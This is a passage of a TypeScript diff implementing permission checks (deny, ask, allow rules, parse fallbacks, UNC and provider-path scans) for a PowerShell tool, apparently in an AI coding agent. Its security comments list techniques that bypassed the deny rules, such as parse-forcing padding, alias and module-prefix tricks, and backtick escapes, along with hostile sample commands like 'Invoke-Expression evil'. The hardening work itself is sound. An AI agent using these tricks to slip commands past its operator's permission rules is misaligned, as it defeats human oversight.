+ // Also resolve the rule's command name to canonical and compare
259
+ // This ensures 'deny rm' also blocks 'Remove-Item'
260
+ // SECURITY: stripModulePrefix applied to DENY/ASK rule command
261
+ // names too, not just input. Otherwise a deny rule written as
262
+ // `Microsoft.PowerShell.Management\Remove-Item:*` is bypassed by `rm`,
263
+ // `del`, or plain `Remove-Item` — resolveToCanonical won't match the
264
+ // module-qualified form against COMMON_ALIASES.
265
+ if (rule.type === 'exact') {
266
+ const rawRuleCmdName = rule.command.split(/\s+/)[0] ?? ''
267
+ const ruleCanonical = resolveToCanonical(
268
+ stripModulePrefixForRule(rawRuleCmdName),
269
+ )
270
+ if (ruleCanonical === inputCanonical) {
271
+ // Rule and input resolve to same canonical cmdlet
272
+ // SECURITY: use normalized `rest` not a raw re-slice
273
+ // from `command`. The raw slice preserves tab separators so
274
+ // `Remove-Item\t./secret.txt` vs deny rule `rm ./secret.txt` misses.
275
+ // Normalize both sides identically.
276
+ const ruleRest = rule.command
277
+ .slice(rawRuleCmdName.length)
278
+ .replace(/^\s+/, ' ')
279
+ const inputRest = rest
280
+ if (strEquals(ruleRest, inputRest)) {
281
+ return true
282
+ }
283
+ }
284
+ } else if (rule.type === 'prefix') {
285
+ const rawRuleCmdName = rule.prefix.split(/\s+/)[0] ?? ''
286
+ const ruleCanonical = resolveToCanonical(
287
+ stripModulePrefixForRule(rawRuleCmdName),
288
+ )
289
+ if (ruleCanonical === inputCanonical) {
290
+ const ruleRest = rule.prefix
291
+ .slice(rawRuleCmdName.length)
292
+ .replace(/^\s+/, ' ')
293
+ const canonicalPrefix = inputCanonical + ruleRest
294
+ if (matchMode === 'exact') {
295
+ if (strEquals(canonicalPrefix, canonicalCommand)) {
296
+ return true
297
+ }
298
+ } else {
299
+ if (
300
+ strEquals(canonicalCommand, canonicalPrefix) ||
301
+ strStartsWith(canonicalCommand, canonicalPrefix + ' ')
302
+ ) {
303
+ return true
304
+ }
305
+ }
306
+ }
307
+ } else if (rule.type === 'wildcard') {
308
+ // Resolve the wildcard pattern's command name to canonical and re-match
309
+ // This ensures 'deny rm *' also blocks 'Remove-Item secret.txt'
310
+ const rawRuleCmdName = rule.pattern.split(/\s+/)[0] ?? ''
311
+ const ruleCanonical = resolveToCanonical(
312
+ stripModulePrefixForRule(rawRuleCmdName),
313
+ )
314
+ if (ruleCanonical === inputCanonical && matchMode !== 'exact') {
315
+ // Rebuild the pattern with the canonical cmdlet name
316
+ // Normalize separator same as exact and prefix branches.
317
+ // Without this, a wildcard rule `rm\t*` produces canonicalPattern
318
+ // with a literal tab that never matches the space-normalized
319
+ // canonicalCommand.
320
+ const ruleRest = rule.pattern
321
+ .slice(rawRuleCmdName.length)
322
+ .replace(/^\s+/, ' ')
323
+ const canonicalPattern = inputCanonical + ruleRest
324
+ if (matchWildcardPattern(canonicalPattern, canonicalCommand, true)) {
325
+ return true
326
+ }
327
+ }
328
+ }
329
+
330
+ return false
331
+ })
332
+ .map(([, rule]) => rule)
333
+ }
334
+
335
+ /**
336
+ * Get matching rules for input across all rule types (deny, ask, allow)
337
+ */
338
+ function matchingRulesForInput(
339
+ input: PowerShellInput,
340
+ toolPermissionContext: ToolPermissionContext,
341
+ matchMode: 'exact' | 'prefix',
342
+ ) {
343
+ const denyRuleByContents = getRuleByContentsForToolName(
344
+ toolPermissionContext,
345
+ POWERSHELL_TOOL_NAME,
346
+ 'deny',
347
+ )
348
+ const matchingDenyRules = filterRulesByContentsMatchingInput(
349
+ input,
350
+ denyRuleByContents,
351
+ matchMode,
352
+ 'deny',
353
+ )
354
+
355
+ const askRuleByContents = getRuleByContentsForToolName(
356
+ toolPermissionContext,
357
+ POWERSHELL_TOOL_NAME,
358
+ 'ask',
359
+ )
360
+ const matchingAskRules = filterRulesByContentsMatchingInput(
361
+ input,
362
+ askRuleByContents,
363
+ matchMode,
364
+ 'ask',
365
+ )
366
+
367
+ const allowRuleByContents = getRuleByContentsForToolName(
368
+ toolPermissionContext,
369
+ POWERSHELL_TOOL_NAME,
370
+ 'allow',
371
+ )
372
+ const matchingAllowRules = filterRulesByContentsMatchingInput(
373
+ input,
374
+ allowRuleByContents,
375
+ matchMode,
376
+ 'allow',
377
+ )
378
+
379
+ return { matchingDenyRules, matchingAskRules, matchingAllowRules }
380
+ }
381
+
382
+ /**
383
+ * Check if the command is an exact match for a permission rule.
384
+ */
385
+ export function powershellToolCheckExactMatchPermission(
386
+ input: PowerShellInput,
387
+ toolPermissionContext: ToolPermissionContext,
388
+ ): PermissionResult {
389
+ const trimmedCommand = input.command.trim()
390
+ const { matchingDenyRules, matchingAskRules, matchingAllowRules } =
391
+ matchingRulesForInput(input, toolPermissionContext, 'exact')
392
+
393
+ if (matchingDenyRules[0] !== undefined) {
394
+ return {
395
+ behavior: 'deny',
396
+ message: `Permission to use ${POWERSHELL_TOOL_NAME} with command ${trimmedCommand} has been denied.`,
397
+ decisionReason: { type: 'rule', rule: matchingDenyRules[0] },
398
+ }
399
+ }
400
+
401
+ if (matchingAskRules[0] !== undefined) {
402
+ return {
403
+ behavior: 'ask',
404
+ message: createPermissionRequestMessage(POWERSHELL_TOOL_NAME),
405
+ decisionReason: { type: 'rule', rule: matchingAskRules[0] },
406
+ }
407
+ }
408
+
409
+ if (matchingAllowRules[0] !== undefined) {
410
+ return {
411
+ behavior: 'allow',
412
+ updatedInput: input,
413
+ decisionReason: { type: 'rule', rule: matchingAllowRules[0] },
414
+ }
415
+ }
416
+
417
+ const decisionReason: PermissionDecisionReason = {
418
+ type: 'other' as const,
419
+ reason: 'This command requires approval',
420
+ }
421
+ return {
422
+ behavior: 'passthrough',
423
+ message: createPermissionRequestMessage(
424
+ POWERSHELL_TOOL_NAME,
425
+ decisionReason,
426
+ ),
427
+ decisionReason,
428
+ suggestions: suggestionForExactCommand(trimmedCommand),
429
+ }
430
+ }
431
+
432
+ /**
433
+ * Check permission for a PowerShell command including prefix matches.
434
+ */
435
+ export function powershellToolCheckPermission(
436
+ input: PowerShellInput,
437
+ toolPermissionContext: ToolPermissionContext,
438
+ ): PermissionResult {
439
+ const command = input.command.trim()
440
+
441
+ // 1. Check exact match first
442
+ const exactMatchResult = powershellToolCheckExactMatchPermission(
443
+ input,
444
+ toolPermissionContext,
445
+ )
446
+
447
+ // 1a. Deny/ask if exact command has a rule
448
+ if (
449
+ exactMatchResult.behavior === 'deny' ||
450
+ exactMatchResult.behavior === 'ask'
451
+ ) {
452
+ return exactMatchResult
453
+ }
454
+
455
+ // 2. Find all matching rules (prefix or exact)
456
+ const { matchingDenyRules, matchingAskRules, matchingAllowRules } =
457
+ matchingRulesForInput(input, toolPermissionContext, 'prefix')
458
+
459
+ // 2a. Deny if command has a deny rule
460
+ if (matchingDenyRules[0] !== undefined) {
461
+ return {
462
+ behavior: 'deny',
463
+ message: `Permission to use ${POWERSHELL_TOOL_NAME} with command ${command} has been denied.`,
464
+ decisionReason: {
465
+ type: 'rule',
466
+ rule: matchingDenyRules[0],
467
+ },
468
+ }
469
+ }
470
+
471
+ // 2b. Ask if command has an ask rule
472
+ if (matchingAskRules[0] !== undefined) {
473
+ return {
474
+ behavior: 'ask',
475
+ message: createPermissionRequestMessage(POWERSHELL_TOOL_NAME),
476
+ decisionReason: {
477
+ type: 'rule',
478
+ rule: matchingAskRules[0],
479
+ },
480
+ }
481
+ }
482
+
483
+ // 3. Allow if command had an exact match allow
484
+ if (exactMatchResult.behavior === 'allow') {
485
+ return exactMatchResult
486
+ }
487
+
488
+ // 4. Allow if command has an allow rule
489
+ if (matchingAllowRules[0] !== undefined) {
490
+ return {
491
+ behavior: 'allow',
492
+ updatedInput: input,
493
+ decisionReason: {
494
+ type: 'rule',
495
+ rule: matchingAllowRules[0],
496
+ },
497
+ }
498
+ }
499
+
500
+ // 5. Passthrough since no rules match, will trigger permission prompt
501
+ const decisionReason = {
502
+ type: 'other' as const,
503
+ reason: 'This command requires approval',
504
+ }
505
+ return {
506
+ behavior: 'passthrough',
507
+ message: createPermissionRequestMessage(
508
+ POWERSHELL_TOOL_NAME,
509
+ decisionReason,
510
+ ),
511
+ decisionReason,
512
+ suggestions: suggestionForExactCommand(command),
513
+ }
514
+ }
515
+
516
+ /**
517
+ * Information about a sub-command for permission checking.
518
+ */
519
+ type SubCommandInfo = {
520
+ text: string
521
+ element: ParsedCommandElement
522
+ statement: ParsedPowerShellCommand['statements'][number] | null
523
+ isSafeOutput: boolean
524
+ }
525
+
526
+ /**
527
+ * Extract sub-commands that need independent permission checking from a parsed command.
528
+ * Safe output cmdlets (Format-Table, Select-Object, etc.) are flagged but NOT
529
+ * filtered out — step 4.4 still checks deny rules against them (deny always
530
+ * wins), step 5 skips them for approval collection (they inherit the permission
531
+ * of the preceding command).
532
+ *
533
+ * Also includes nested commands from control flow statements (if, for, foreach, etc.)
534
+ * to ensure commands hidden inside control flow are checked.
535
+ *
536
+ * Returns sub-command info including both text and the parsed element for accurate
537
+ * suggestion generation.
538
+ */
539
+ async function getSubCommandsForPermissionCheck(
540
+ parsed: ParsedPowerShellCommand,
541
+ originalCommand: string,
542
+ ): Promise<SubCommandInfo[]> {
543
+ if (!parsed.valid) {
544
+ // Return a fallback element for unparsed commands
545
+ return [
546
+ {
547
+ text: originalCommand,
548
+ element: {
549
+ name: await extractCommandName(originalCommand),
550
+ nameType: 'unknown',
551
+ elementType: 'CommandAst',
552
+ args: [],
553
+ text: originalCommand,
554
+ },
555
+ statement: null,
556
+ isSafeOutput: false,
557
+ },
558
+ ]
559
+ }
560
+
561
+ const subCommands: SubCommandInfo[] = []
562
+
563
+ // Check direct commands in pipelines
564
+ for (const statement of parsed.statements) {
565
+ for (const cmd of statement.commands) {
566
+ // Only check actual commands (CommandAst), not expressions
567
+ if (cmd.elementType !== 'CommandAst') {
568
+ continue
569
+ }
570
+ subCommands.push({
571
+ text: cmd.text,
572
+ element: cmd,
573
+ statement,
574
+ // SECURITY: nameType gate — scripts\\Out-Null strips to Out-Null and
575
+ // would match SAFE_OUTPUT_CMDLETS, but PowerShell runs the .ps1 file.
576
+ // isSafeOutput: true causes step 5 to filter this command out of the
577
+ // approval list, so it would silently execute. See isAllowlistedCommand.
578
+ // SECURITY: args.length === 0 gate — Out-Null -InputObject:(1 > /etc/x)
579
+ // was filtered as safe-output (name-only) → step-5 subCommands empty →
580
+ // auto-allow → redirection inside paren writes file. Only zero-arg
581
+ // Out-String/Out-Null/Out-Host invocations are provably safe.
582
+ isSafeOutput:
583
+ cmd.nameType !== 'application' &&
584
+ isSafeOutputCommand(cmd.name) &&
585
+ cmd.args.length === 0,
586
+ })
587
+ }
588
+
589
+ // Also check nested commands from control flow statements
590
+ if (statement.nestedCommands) {
591
+ for (const cmd of statement.nestedCommands) {
592
+ subCommands.push({
593
+ text: cmd.text,
594
+ element: cmd,
595
+ statement,
596
+ isSafeOutput:
597
+ cmd.nameType !== 'application' &&
598
+ isSafeOutputCommand(cmd.name) &&
599
+ cmd.args.length === 0,
600
+ })
601
+ }
602
+ }
603
+ }
604
+
605
+ if (subCommands.length > 0) {
606
+ return subCommands
607
+ }
608
+
609
+ // Fallback for commands with no sub-commands
610
+ return [
611
+ {
612
+ text: originalCommand,
613
+ element: {
614
+ name: await extractCommandName(originalCommand),
615
+ nameType: 'unknown',
616
+ elementType: 'CommandAst',
617
+ args: [],
618
+ text: originalCommand,
619
+ },
620
+ statement: null,
621
+ isSafeOutput: false,
622
+ },
623
+ ]
624
+ }
625
+
626
+ /**
627
+ * Main permission check function for PowerShell tool.
628
+ *
629
+ * This function implements the full permission flow:
630
+ * 1. Check exact match against deny/ask/allow rules
631
+ * 2. Check prefix match against rules
632
+ * 3. Run security check via powershellCommandIsSafe()
633
+ * 4. Return appropriate PermissionResult
634
+ *
635
+ * @param input - The PowerShell tool input
636
+ * @param context - The tool use context (for abort signal and session info)
637
+ * @returns Promise resolving to PermissionResult
638
+ */
639
+ export async function powershellToolHasPermission(
640
+ input: PowerShellInput,
641
+ context: ToolUseContext,
642
+ ): Promise<PermissionResult> {
643
+ const toolPermissionContext = context.getAppState().toolPermissionContext
644
+ const command = input.command.trim()
645
+
646
+ // Empty command check
647
+ if (!command) {
648
+ return {
649
+ behavior: 'allow',
650
+ updatedInput: input,
651
+ decisionReason: {
652
+ type: 'other',
653
+ reason: 'Empty command is safe',
654
+ },
655
+ }
656
+ }
657
+
658
+ // Parse the command once and thread through all sub-functions
659
+ const parsed = await parsePowerShellCommand(command)
660
+
661
+ // SECURITY: Check deny/ask rules BEFORE parse validity check.
662
+ // Deny rules operate on the raw command string and don't need the parsed AST.
663
+ // This ensures explicit deny rules still block commands even when parsing fails.
664
+ // 1. Check exact match first
665
+ const exactMatchResult = powershellToolCheckExactMatchPermission(
666
+ input,
667
+ toolPermissionContext,
668
+ )
669
+
670
+ // Exact command was denied
671
+ if (exactMatchResult.behavior === 'deny') {
672
+ return exactMatchResult
673
+ }
674
+
675
+ // 2. Check prefix/wildcard rules
676
+ const { matchingDenyRules, matchingAskRules } = matchingRulesForInput(
677
+ input,
678
+ toolPermissionContext,
679
+ 'prefix',
680
+ )
681
+
682
+ // 2a. Deny if command has a deny rule
683
+ if (matchingDenyRules[0] !== undefined) {
684
+ return {
685
+ behavior: 'deny',
686
+ message: `Permission to use ${POWERSHELL_TOOL_NAME} with command ${command} has been denied.`,
687
+ decisionReason: {
688
+ type: 'rule',
689
+ rule: matchingDenyRules[0],
690
+ },
691
+ }
692
+ }
693
+
694
+ // 2b. Ask if command has an ask rule — DEFERRED into decisions[].
695
+ // Previously this early-returned before sub-command deny checks ran, so
696
+ // `Get-Process; Invoke-Expression evil` with ask(Get-Process:*) +
697
+ // deny(Invoke-Expression:*) would show the ask dialog and the deny never
698
+ // fired. Now: store the ask, push into decisions[] after parse succeeds.
699
+ // If parse fails, returned before the parse-error ask (preserves the
700
+ // rule-attributed decisionReason when pwsh is unavailable).
701
+ let preParseAskDecision: PermissionResult | null = null
702
+ if (matchingAskRules[0] !== undefined) {
703
+ preParseAskDecision = {
704
+ behavior: 'ask',
705
+ message: createPermissionRequestMessage(POWERSHELL_TOOL_NAME),
706
+ decisionReason: {
707
+ type: 'rule',
708
+ rule: matchingAskRules[0],
709
+ },
710
+ }
711
+ }
712
+
713
+ // Block UNC paths — reading from UNC paths can trigger network requests
714
+ // and leak NTLM/Kerberos credentials. DEFERRED into decisions[].
715
+ // The raw-string UNC check must not early-return before sub-command deny
716
+ // (step 4+). Same fix as 2b above.
717
+ if (preParseAskDecision === null && containsVulnerableUncPath(command)) {
718
+ preParseAskDecision = {
719
+ behavior: 'ask',
720
+ message:
721
+ 'Command contains a UNC path that could trigger network requests',
722
+ }
723
+ }
724
+
725
+ // 2c. Exact allow rules short-circuit here ONLY when parsing failed AND
726
+ // no pre-parse ask (2b prefix or UNC) is pending. Converting 2b/UNC from
727
+ // early-return to deferred-assign meant 2c
728
+ // fired before L648 consumed preParseAskDecision — silently overriding the
729
+ // ask with allow. Parse-succeeded path enforces ask > allow via the reduce
730
+ // (L917); without this guard, parse-failed was inconsistent.
731
+ // This ensures user-configured exact allow rules work even when pwsh is
732
+ // unavailable. When parsing succeeds, the exact allow check is deferred to
733
+ // after step 4.4 (sub-command deny/ask) — matching BashTool's ordering where
734
+ // the main-flow exact allow at bashPermissions.ts:1520 runs after sub-command
735
+ // deny checks (1442-1458). Without this, an exact allow on a compound command
736
+ // would bypass deny rules on sub-commands.
737
+ //
738
+ // SECURITY (parse-failed branch): the nameType guard in step 5 lives
739
+ // inside the sub-command loop, which only runs when parsed.valid.
740
+ // This is the !parsed.valid escape hatch. Input-side stripModulePrefix
741
+ // is unconditional — `scripts\build.exe --flag` strips to `build.exe`,
742
+ // canonicalCommand matches exact allow, and without this guard we'd
743
+ // return allow here and execute the local script. classifyCommandName
744
+ // is a pure string function (no AST needed). `scripts\build.exe` →
745
+ // 'application' (has `\`). Same tradeoff as step 5: `build.exe` alone
746
+ // also classifies 'application' (has `.`) so legitimate executable
747
+ // exact-allows downgrade to ask when pwsh is degraded — fail-safe.
748
+ // Module-qualified cmdlets (Module\Cmdlet) also classify 'application'
749
+ // (same `\`); same fail-safe over-fire.
750
+ if (
751
+ exactMatchResult.behavior === 'allow' &&
752
+ !parsed.valid &&
753
+ preParseAskDecision === null &&
754
+ classifyCommandName(command.split(/\s+/)[0] ?? '') !== 'application'
755
+ ) {
756
+ return exactMatchResult
757
+ }
758
+
759
+ // 0. Check if command can be parsed - if not, require approval but don't suggest persisting
760
+ // This matches Bash behavior: invalid syntax triggers a permission prompt but we don't
761
+ // recommend saving invalid commands to settings
762
+ // NOTE: This check is intentionally AFTER deny/ask rules so explicit rules still work
763
+ // even when the parser fails (e.g., pwsh unavailable).
764
+ if (!parsed.valid) {
765
+ // SECURITY: Fallback sub-command deny scan for parse-failed path.
766
+ // The sub-command deny loop at L851+ needs the AST; when parsing fails
767
+ // (command exceeds MAX_COMMAND_LENGTH, pwsh unavailable, timeout, bad
768
+ // JSON), we'd return 'ask' without ever checking sub-command deny rules.
769
+ // Attack: `Get-ChildItem # <~2000 chars padding> ; Invoke-Expression evil`
770
+ // → padding forces valid=false → generic ask prompt, deny(iex:*) never
771
+ // fires. This fallback splits on PowerShell separators/grouping and runs
772
+ // each fragment through the SAME rule matcher as step 2a (prefix deny).
773
+ // Conservative: fragments inside string literals/comments may false-positive
774
+ // deny — safe here (parse-failed is already a degraded state, and this is
775
+ // a deny-DOWNGRADE fix). Match against full fragment (not just first token)
776
+ // so multi-word rules like `Remove-Item foo:*` still fire; the matcher's
777
+ // canonical resolution handles aliases (`iex` → `Invoke-Expression`).
778
+ //
779
+ // SECURITY: backtick is PS escape/line-continuation, NOT a separator.
780
+ // Splitting on it would fragment `Invoke-Ex`pression` into non-matching
781
+ // pieces. Instead: collapse backtick-newline (line continuation) so
782
+ // `Invoke-Ex`<nl>pression` rejoins, strip remaining backticks (escape
783
+ // chars — ``x → x), then split on actual statement/grouping separators.
784
+ const backtickStripped = command
785
+ .replace(/`[\r\n]+\s*/g, '')
786
+ .replace(/`/g, '')
787
+ for (const fragment of backtickStripped.split(/[;|\n\r{}()&]+/)) {
788
+ const trimmedFrag = fragment.trim()
789
+ if (!trimmedFrag) continue // skip empty fragments
790
+ // Skip the full command ONLY if it starts with a cmdlet name (no
791
+ // assignment prefix). The full command was already checked at 2a, but
792
+ // 2a uses the raw text — $x %= iex as first token `$x` misses the
793
+ // deny(iex:*) rule. If normalization would change the fragment
794
+ // (assignment prefix, dot-source), don't skip — let it be re-checked
795
+ // after normalization. (bug #10/#24)
796
+ if (
797
+ trimmedFrag === command &&
798
+ !/^\$[\w:]/.test(trimmedFrag) &&
799
+ !/^[&.]\s/.test(trimmedFrag)
800
+ ) {
801
+ continue
802
+ }
803
+ // SECURITY: Normalize invocation-operator and assignment prefixes before
804
+ // rule matching (findings #5/#22). The splitter gives us the raw fragment
805
+ // text; matchingRulesForInput extracts the first token as the cmdlet name.
806
+ // Without normalization:
807
+ // `$x = Invoke-Expression 'p'` → first token `$x` → deny(iex:*) misses
808
+ // `. Invoke-Expression 'p'` → first token `.` → deny(iex:*) misses
809
+ // `& 'Invoke-Expression' 'p'` → first token `&` removed by split but
810
+ // `'Invoke-Expression'` retains quotes
811
+ // → deny(iex:*) misses
812
+ // The parse-succeeded path handles these via AST (parser.ts:839 strips
813
+ // quotes from rawNameUnstripped; invocation operators are separate AST
814
+ // nodes). This fallback mirrors that normalization.
815
+ // Loop strips nested assignments: $x = $y = iex → $y = iex → iex
816
+ let normalized = trimmedFrag
817
+ let m: RegExpMatchArray | null
818
+ while ((m = normalized.match(PS_ASSIGN_PREFIX_RE))) {
819
+ normalized = normalized.slice(m[0].length)
820
+ }
821
+ normalized = normalized.replace(/^[&.]\s+/, '') // & cmd, . cmd (dot-source)
822
+ const rawFirst = normalized.split(/\s+/)[0] ?? ''
823
+ const firstTok = rawFirst.replace(/^['"]|['"]$/g, '')
824
+ const normalizedFrag = firstTok + normalized.slice(rawFirst.length)
825
+ // SECURITY: parse-independent dangerous-removal hard-deny. The
826
+ // isDangerousRemovalPath check in checkPathConstraintsForStatement
827
+ // requires a valid AST; when pwsh times out or is unavailable,
828
+ // `Remove-Item /` degrades from hard-deny to generic ask. Check
829
+ // raw positional args here so root/home/system deletion is denied
830
+ // regardless of parser availability. Conservative: only positional
831
+ // args (skip -Param tokens); over-deny in degraded state is safe
832
+ // (same deny-downgrade rationale as the sub-command scan above).
833
+ if (resolveToCanonical(firstTok) === 'remove-item') {
834
+ for (const arg of normalized.split(/\s+/).slice(1)) {
835
+ if (PS_TOKENIZER_DASH_CHARS.has(arg[0] ?? '')) continue
836
+ if (isDangerousRemovalRawPath(arg)) {
837
+ return dangerousRemovalDeny(arg)
838
+ }
839
+ }
840
+ }
841
+ const { matchingDenyRules: fragDenyRules } = matchingRulesForInput(
842
+ { command: normalizedFrag },
843
+ toolPermissionContext,
844
+ 'prefix',
845
+ )
846
+ if (fragDenyRules[0] !== undefined) {
847
+ return {
848
+ behavior: 'deny',
849
+ message: `Permission to use ${POWERSHELL_TOOL_NAME} with command ${command} has been denied.`,
850
+ decisionReason: { type: 'rule', rule: fragDenyRules[0] },
851
+ }
852
+ }
853
+ }
854
+ // Preserve pre-parse ask messaging when parse fails. The deferred ask
855
+ // (2b prefix rule or UNC) carries a better decisionReason than the
856
+ // generic parse-error ask. Sub-command deny can't run the AST loop
857
+ // without a parse, so the fallback scan above is best-effort.
858
+ if (preParseAskDecision !== null) {
859
+ return preParseAskDecision
860
+ }
861
+ const decisionReason = {
862
+ type: 'other' as const,
863
+ reason: `Command contains malformed syntax that cannot be parsed: ${parsed.errors[0]?.message ?? 'unknown error'}`,
864
+ }
865
+ return {
866
+ behavior: 'ask',
867
+ decisionReason,
868
+ message: createPermissionRequestMessage(
869
+ POWERSHELL_TOOL_NAME,
870
+ decisionReason,
871
+ ),
872
+ // No suggestions - don't recommend persisting invalid syntax
873
+ }
874
+ }
875
+
876
+ // ========================================================================
877
+ // COLLECT-THEN-REDUCE: post-parse decisions (deny > ask > allow > passthrough)
878
+ // ========================================================================
879
+ // Ported from bashPermissions.ts:1446-1472. Every post-parse check pushes
880
+ // its decision into a single array; a single reduce applies precedence.
881
+ // This structurally closes the ask-before-deny bug class: an 'ask' from an
882
+ // earlier check (security flags, provider paths, cd+git) can no longer mask
883
+ // a 'deny' from a later check (sub-command deny, checkPathConstraints).
884
+ //
885
+ // Supersedes the firstSubCommandAskRule stash from commit 8f5ae6c56b — that
886
+ // fix only patched step 4; steps 3, 3.5, 4.42 had the same flaw. The stash
887
+ // pattern is also fragile: the next author who writes `return ask` is back
888
+ // where we started. Collect-then-reduce makes the bypass impossible to write.
889
+ //
890
+ // First-of-each-behavior wins (array order = step order), so single-check
891
+ // ask messages are unchanged vs. sequential-early-return.
892
+ //
893
+ // Pre-parse deny checks above (exact/prefix deny) stay sequential: they
894
+ // fire even when pwsh is unavailable. Pre-parse asks (prefix ask, raw UNC)
895
+ // are now deferred here so sub-command deny (step 4) beats them.
896
+
897
+ // Gather sub-commands once (used by decisions 3, 4, and fallthrough step 5).
898
+ const allSubCommands = await getSubCommandsForPermissionCheck(parsed, command)
899
+
900
+ const decisions: PermissionResult[] = []
901
+
902
+ // Decision: deferred pre-parse ask (2b prefix ask or UNC path).
903
+ // Pushed first so its message wins over later asks (first-of-behavior wins),
904
+ // but the reduce ensures any deny in decisions[] still beats it.
905
+ if (preParseAskDecision !== null) {
906
+ decisions.push(preParseAskDecision)
907
+ }
908
+
909
+ // Decision: security check — was step 3 (:630-650).
910
+ // powershellCommandIsSafe returns 'ask' for subexpressions, script blocks,
911
+ // encoded commands, download cradles, etc. Only 'ask' | 'passthrough'.
912
+ const safetyResult = powershellCommandIsSafe(command, parsed)
913
+ if (safetyResult.behavior !== 'passthrough') {
914
+ const decisionReason: PermissionDecisionReason = {
915
+ type: 'other' as const,
916
+ reason:
917
+ safetyResult.behavior === 'ask' && safetyResult.message
918
+ ? safetyResult.message
919
+ : 'This command contains patterns that could pose security risks and requires approval',
920
+ }
921
+ decisions.push({
922
+ behavior: 'ask',
923
+ message: createPermissionRequestMessage(
924
+ POWERSHELL_TOOL_NAME,
925
+ decisionReason,
926
+ ),
927
+ decisionReason,
928
+ suggestions: suggestionForExactCommand(command),
929
+ })
930
+ }
931
+
932
+ // Decision: using statements / script requirements — invisible to AST block walk.
933
+ // `using module ./evil.psm1` loads and executes a module's top-level script body;
934
+ // `using assembly ./evil.dll` loads a .NET assembly (module initializers run).
935
+ // `#Requires -Modules <name>` triggers module loading from PSModulePath.
936
+ // These are siblings of the named blocks on ScriptBlockAst, not children, so
937
+ // Process-BlockStatements and all downstream command walkers never see them.
938
+ // Without this check, a decoy cmdlet like Get-Process fills subCommands,
939
+ // bypassing the empty-statement fallback, and isReadOnlyCommand auto-allows.
940
+ if (parsed.hasUsingStatements) {
941
+ const decisionReason: PermissionDecisionReason = {
942
+ type: 'other' as const,
943
+ reason:
944
+ 'Command contains a `using` statement that may load external code (module or assembly)',
945
+ }
946
+ decisions.push({
947
+ behavior: 'ask',
948
+ message: createPermissionRequestMessage(
949
+ POWERSHELL_TOOL_NAME,
950
+ decisionReason,
951
+ ),
952
+ decisionReason,
953
+ suggestions: suggestionForExactCommand(command),
954
+ })
955
+ }
956
+ if (parsed.hasScriptRequirements) {
957
+ const decisionReason: PermissionDecisionReason = {
958
+ type: 'other' as const,
959
+ reason:
960
+ 'Command contains a `#Requires` directive that may trigger module loading',
961
+ }
962
+ decisions.push({
963
+ behavior: 'ask',
964
+ message: createPermissionRequestMessage(
965
+ POWERSHELL_TOOL_NAME,
966
+ decisionReason,
967
+ ),
968
+ decisionReason,
969
+ suggestions: suggestionForExactCommand(command),
970
+ })
971
+ }
972
+
973
+ // Decision: resolved-arg provider/UNC scan — was step 3.5 (:652-709).
974
+ // Provider paths (env:, HKLM:, function:) access non-filesystem resources.
975
+ // UNC paths can leak NTLM/Kerberos credentials on Windows. The raw-string
976
+ // UNC check above (pre-parse) misses backtick-escaped forms; cmd.args has
977
+ // backtick escapes resolved by the parser. Labeled loop breaks on FIRST
978
+ // match (same as the previous early-return).
979
+ // Provider prefix matches both the short form (`env:`, `HKLM:`) and the
980
+ // fully-qualified form (`Microsoft.PowerShell.Core\Registry::HKLM\...`).
981
+ // The optional `(?:[\w.]+\\)?` handles the module-qualified prefix; `::?`
982
+ // matches either single-colon drive syntax or double-colon provider syntax.
983
+ const NON_FS_PROVIDER_PATTERN =
984
+ /^(?:[\w.]+\\)?(env|hklm|hkcu|function|alias|variable|cert|wsman|registry)::?/i
985
+ function extractProviderPathFromArg(arg: string): string {
986
+ // Handle colon parameter syntax: -Path:env:HOME → extract 'env:HOME'.
987
+ // SECURITY: PowerShell's tokenizer accepts en-dash/em-dash/horizontal-bar
988
+ // (U+2013/2014/2015) as parameter prefixes. `–Path:env:HOME` (en-dash)
989
+ // must also strip the `–Path:` prefix or NON_FS_PROVIDER_PATTERN won't
990
+ // match (pattern is `^(env|...):` which fails on `–Path:env:...`).
991
+ let s = arg
992
+ if (s.length > 0 && PS_TOKENIZER_DASH_CHARS.has(s[0]!)) {
993
+ const colonIdx = s.indexOf(':', 1) // skip the leading dash
994
+ if (colonIdx > 0) {
995
+ s = s.substring(colonIdx + 1)
996
+ }
997
+ }
998
+ // Strip backtick escapes before matching: `Registry`::HKLM\...` has a
999
+ // backtick before `::` that the PS tokenizer removes at runtime but that
1000
+ // would otherwise prevent the ^-anchored pattern from matching.
1001
+ return s.replace(/`/g, '')
1002
+ }
1003
+ function providerOrUncDecisionForArg(arg: string): PermissionResult | null {
1004
+ const value = extractProviderPathFromArg(arg)
1005
+ if (NON_FS_PROVIDER_PATTERN.test(value)) {
1006
+ return {
1007
+ behavior: 'ask',
1008
+ message: `Command argument '${arg}' uses a non-filesystem provider path and requires approval`,
1009
+ }
1010
+ }
1011
+ if (containsVulnerableUncPath(value)) {
1012
+ return {
1013
+ behavior: 'ask',
1014
+ message: `Command argument '${arg}' contains a UNC path that could trigger network requests`,
1015
+ }
1016
+ }
1017
+ return null
1018
+ }
1019
+ providerScan: for (const statement of parsed.statements) {
1020
+ for (const cmd of statement.commands) {
1021
+ if (cmd.elementType !== 'CommandAst') continue
1022
+ for (const arg of cmd.args) {
1023
+ const decision = providerOrUncDecisionForArg(arg)
1024
+ if (decision !== null) {
1025
+ decisions.push(decision)
1026
+ break providerScan
1027
+ }
1028
+ }
1029
+ }
1030
+ if (statement.nestedCommands) {
1031
+ for (const cmd of statement.nestedCommands) {
1032
+ for (const arg of cmd.args) {
1033
+ const decision = providerOrUncDecisionForArg(arg)
1034
+ if (decision !== null) {
1035
+ decisions.push(decision)
1036
+ break providerScan
1037
+ }
1038
+ }
1039
+ }
1040
+ }
1041
+ }
1042
+
1043
+ // Decision: per-sub-command deny/ask rules — was step 4 (:711-803).
1044
+ // Each sub-command produces at most one decision (deny or ask). Deny rules
1045
+ // on LATER sub-commands still beat ask rules on EARLIER ones via the reduce.
1046
+ // No stash needed — the reduce structurally enforces deny > ask.
1047
+ //
1048
+ // SECURITY: Always build a canonical command string from AST-derived data
1049
+ // (element.name + space-joined args) and check rules against it too. Deny
1050
+ // and allow must use the same normalized form to close asymmetries:
1051
+ // - Invocation operators (`& 'Remove-Item' ./x`): raw text starts with `&`,
1052
+ // splitting on whitespace yields the operator, not the cmdlet name.
1053
+ // - Non-space whitespace (`rm\t./x`): raw prefix match uses `prefix + ' '`
1054
+ // (literal space), but PowerShell accepts any whitespace separator.
1055
+ // checkPermissionMode auto-allow (using AST cmd.name) WOULD match while
1056
+ // deny-rule match on raw text would miss — a deny-rule bypass.
1057
